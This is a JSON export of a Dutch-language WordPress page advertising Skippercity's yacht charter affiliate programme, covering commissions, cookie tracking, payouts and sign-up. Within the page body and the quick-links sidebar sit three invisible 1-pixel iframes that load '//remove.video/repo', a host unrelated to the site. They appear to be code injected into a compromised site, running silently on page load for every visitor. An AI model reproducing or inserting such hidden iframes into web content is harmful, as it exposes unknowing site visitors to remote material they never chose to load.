{"id":412092,"date":"2024-01-15T12:32:29","date_gmt":"2024-01-15T12:32:29","guid":{"rendered":"https:\/\/www.skippercity.com\/yacht-charter-affiliate-programma\/"},"modified":"2024-02-21T11:19:51","modified_gmt":"2024-02-21T11:19:51","slug":"yacht-charter-affiliate-programma","status":"publish","type":"page","link":"https:\/\/skippercity.com\/nl\/yacht-charter-affiliate-programma\/","title":{"rendered":"Yacht Charter Affiliate Programma"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"412092\" class=\"elementor elementor-412092 elementor-412040\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1250e588 elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1250e588\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-9f1c76f\" data-id=\"9f1c76f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4a4f0833 elementor-widget elementor-widget-heading\" data-id=\"4a4f0833\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Yacht Charter Affiliate Programma<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4eaa1748 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4eaa1748\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-25087f4b\" data-id=\"25087f4b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-571c4982\" data-id=\"571c4982\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-66f25697\" data-id=\"66f25697\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4518a569 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"4518a569\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-4a55adf6\" data-id=\"4a55adf6\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-225b732b elementor-widget elementor-widget-text-editor\" data-id=\"225b732b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\"><strong>Snelle feiten:<\/strong><\/span><\/p>\n<ul>\n<li>Het best betaalde affiliate programma<\/li>\n<li>20-25% van onze commissie op bootverhuur<\/li>\n<li>Levenslange commissies<\/li>\n<li>365 dagen cookie vervaldatum<\/li>\n<\/ul>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-16c35e15 elementor-widget elementor-widget-table-of-contents\" data-id=\"16c35e15\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;Er zijn geen kopteksten gevonden op deze pagina.&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tInhoudsopgave\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__16c35e15\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-70ed3a7f\" data-id=\"70ed3a7f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4c5b7b5f elementor-widget elementor-widget-text-editor\" data-id=\"4c5b7b5f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Yacht Charter Affiliate Programma<\/h2>\n<p>Als u een website hebt met klanten die ge\u00efnteresseerd zouden kunnen zijn in het charteren van jachten &#8211; zeilboten, gulets, motorjachten, superjachten &#8211; zowat overal ter wereld, dan zouden we graag met u samenwerken aan een affiliate partnerschap.<\/p>\n<p><u><b>We houden van Partners!<\/b><\/u><\/p>\n<p>Met het Yachtco Affiliate Programma kunt u geld verdienen met jachtcharters door simpelweg een link van uw site naar de onze toe te voegen.<\/p>\n<h2>Hoe werkt het?<\/h2>\n<p>Wanneer een klant <strong>op uw link klikt op uw website<\/strong> (of blog of sociale media), op onze site terechtkomt en vervolgens via ons een boot huurt, wordt een percentage van de commissie aan u gecrediteerd volgens onze algemene voorwaarden. Alles wordt gemonitord (elektronisch en offline) en wij monitoren de leadstatus voor je.<\/p>\n<p><strong>Een makelaar (dat zijn wij) verdient een vergoeding<\/strong> over de netto charterwaarde van een geboekte boot (exclusief APA of extra bestelde items of diensten). Deze commissie is afhankelijk van de locatie, het boottype en de commissies van de branche. <strong>De affiliate (jij dus) krijgt 20%-25%<\/strong> als basistarief voor deze vergoeding van de makelaar.<\/p>\n<p><b>Skippercity is er trots op alle charterklanten trouw op te volgen en daarom worden affiliates gecompenseerd door 20%-25% van onze commissie te verdienen op alle boekingen van klanten die naar ons terugkeren.<\/b><\/p>\n<p>Ons systeem volgt klanten die eerder bij een affiliate hebben ge\u00efnformeerd of bij een affiliate hebben geboekt, zodat we commissies altijd aan de affiliate kunnen teruggeven. Skippercity zal de introductie respecteren en affiliates een introductievergoeding aanbieden als de klant terugkeert naar Skippercity buiten het affiliate programma om (d.w.z. geen cookies) om de link die ze ons hebben gegeven te eren, omdat ze eerder bij ons zijn gekomen na informatie te hebben ingewonnen via een affiliate.<\/p>\n<p>3.000 euro is de gemiddelde netto charterwaarde om je commissie te ontvangen. Onze algemene voorwaarden zijn van toepassing.<\/p>\n<p>We hebben manieren om vragen te stellen, stijlvolle afbeeldingen en knoppen voor je. Deze zijn allemaal beschikbaar via je affiliate &#8220;dashboard&#8221;, dus je hoeft alleen maar de code te kopi\u00ebren en in je website te plakken, en je kunt aan de slag!<\/p>\n<p>Je URL voor affiliates zal https:\/\/skippercity.com\/?ref=username zijn. Je installeert gewoon de code (?ref=?ref=username) aan het einde van elke link naar Skippercity en vanaf daar wordt alles gecontroleerd!<\/p>\n<p><a href=\"https:\/\/skippercity.com\/nl\/word-onze-partner\/\">Als je ge\u00efnteresseerd bent om je aan te melden voor ons affiliate programma, klik dan hier om je aan<\/a> te melden en we zullen je aanvraag om deel te nemen aan het programma verwerken.<\/p>\n<p>Alle inhoud op SkipperCity website is auteursrechtelijk beschermd. We moedigen onze filialen niet aan om inhoud op https:\/\/skippercity.com te gebruiken en het materiaal op hun eigen website op de een of andere manier als hun eigen materiaal te kopi\u00ebren of dupliceren. Maar je bent welkom om je eigen inhoud te bedenken en naar ons te linken.<\/p>\n<h2>Hoe we de verkoop bijhouden<\/h2>\n<p>Alle klanten die van jouw site komen, worden &#8220;gekokied&#8221; en jouw account wordt aan cookies gekoppeld. Wanneer een klant ons een aanvraag stuurt of een account bij ons aanmaakt, doen we wat we het beste kunnen &#8211; de juiste boot aanbevelen, het contract en de betalingen regelen en ervoor zorgen dat de klant aan boord komt.<\/p>\n<p>Als de klant die een jacht huurt van uw website komt, zullen wij een deel van de commissie met u delen.<\/p>\n<h2>Hoe krijg je betaald?<\/h2>\n<p>We betalen onze filialen per bankoverschrijving of via Stripe.<\/p>\n<p>Affiliates worden \u00e9\u00e9n maand na de bevredigende voltooiing van het charter betaald &#8211; dit is de industrienorm voor alle ge\u00efnteresseerde partijen. Alle deelnemers worden betaald bij een succesvolle afronding van de charter, want als er problemen zijn tijdens de charter, willen we er zeker van zijn dat de makelaars, de jachtmanagers, de schippers en de eigenaren deze oplossen voordat de klanten van boord gaan.<\/p>\n<p>Voor alle geannuleerde charters (door klanten of eigenaren), affiliates, reisagenten en alle verwijzingen wordt geen commissie in rekening gebracht.<\/p>\n<h2>Hoe meld je je aan voor het partnerprogramma<\/h2>\n<p>U moet een bestaande website, blog of sociaal netwerk hebben met een klantenbestand dat complementair is aan de jachtcharter (reizen, luxeproducten, conci\u00ebrgediensten, enz.) om u aan te melden voor het affiliate programma.<\/p>\n<p>Je hebt geen enkel risico of kosten voor het affiliate programma. Je hoeft alleen maar <a href=\"https:\/\/skippercity.com\/nl\/word-onze-partner\/\">ons online formulier in te vullen.<\/a><iframe style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-74185aa8 elementor-align-justify elementor-widget elementor-widget-button\" data-id=\"74185aa8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/skippercity.com\/nl\/word-onze-partner\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Meld u aan voor ons Yacht Charter Affiliate Programma<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-1b9e4a7d\" data-id=\"1b9e4a7d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c060e83 elementor-widget elementor-widget-text-editor\" data-id=\"7c060e83\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"text-decoration: underline;\">Snelle links:<\/span><\/p>\n<ul>\n<li><a href=\"https:\/\/skippercity.com\/nl\/word-onze-partner\/\">Registreren\/aanmelden<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/nl\/affiliate-inloggen\/\">Inloggen<\/a><\/li>\n<li><a href=\"https:\/\/skippercity.com\/nl\/mijn-rekening-2\/\">Je affiliate account<\/a><\/li>\n<\/ul>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Yacht Charter Affiliate Programma Snelle feiten: Het best betaalde affiliate programma 20-25% van onze commissie op bootverhuur Levenslange commissies 365 dagen cookie vervaldatum Inhoudsopgave Yacht Charter Affiliate Programma Als u een website hebt met klanten die ge\u00efnteresseerd zouden kunnen zijn in het charteren van jachten &#8211; zeilboten, gulets, motorjachten, superjachten &#8211; zowat overal ter wereld, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-412092","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/pages\/412092","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/comments?post=412092"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/pages\/412092\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/nl\/wp-json\/wp\/v2\/media?parent=412092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}